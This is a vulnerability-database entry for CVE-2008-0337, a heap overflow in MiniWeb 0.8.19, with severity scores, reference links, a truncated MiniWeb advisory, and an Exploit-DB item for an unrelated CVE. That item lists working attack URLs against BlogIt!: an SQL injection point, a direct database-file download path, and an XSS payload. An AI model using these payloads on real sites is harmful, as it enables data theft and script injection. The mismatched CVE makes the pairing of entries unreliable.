CVE-2008-0337
Published 2008-01-17
Priority: P3 47, high, 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 5.36% (91.6th percentile)
Heap-based buffer overflow in the _mwProcessReadSocket function in http.c in MiniWeb HTTP Server 0.8.19 allows remote attackers to execute arbitrary code via a long URI.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| miniweb_http_server | miniweb_http_server | — | — |
No detection rules found.
Exploit-DB
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
exploitdb·2009-01-16
CVE-2009-0337 blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
---
#########################################################
Portal Name: BlogIt!
Download : http://www.katywhitton.com/downloads/BlogIt!/BlogItDL.zip
Author : Pouya_Server , [email protected]
Vulnerability : (SQL/DD/XSS)
#########################################################
[SQL]:
http://site.com/[Path]/index.asp?view=archive&day=[SQL]
[DD]:
http://site.com/[Path]/database/Blog.mdb
[XSS]:
http://site.com/[Path]/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
# milw0rm.com [2009-01-16]
Exploit-DB
Miniweb 0.8.19 - Multiple Vulnerabilities
exploitdb·2008-01-16
CVE-2008-0338 Miniweb 0.8.19 - Multiple Vulnerabilities
---
MiniWeb Multiple Vulnerabilities
Introduction
MiniWeb is a mini HTTP server implementation written in C language,
featuring low system resource consumption, high efficiency, good
flexibility and high portability.
It is capable of serving multiple clients with a single thread,
supporting GET and POST methods, authentication, dynamic contents
(dynamic web page and page variable substitution) and file uploading.
MiniWeb runs on POSIX compliant OS, like Linux, as well as Microsoft Windows.
vulnerability discovered by : Hamid Ebadi (ebadi _AT_ bugtraq.ir)
http://www.bugtraq.ir
complete advisory and also source code auditing can be found at :
http://www.bugtraq.ir/adv/miniweb_persian.pdf (Persian)
http://www.bugtraq.ir/adv/miniweb_english.pdf (e
No writeups or analysis indexed.
http://secunia.com/advisories/28512
http://www.bugtraq.ir/adv/miniweb_english.pdf
http://www.securityfocus.com/bid/27319
http://www.vupen.com/english/advisories/2008/0176
https://exchange.xforce.ibmcloud.com/vulnerabilities/39718
https://www.exploit-db.com/exploits/4923
2008-01-17
Published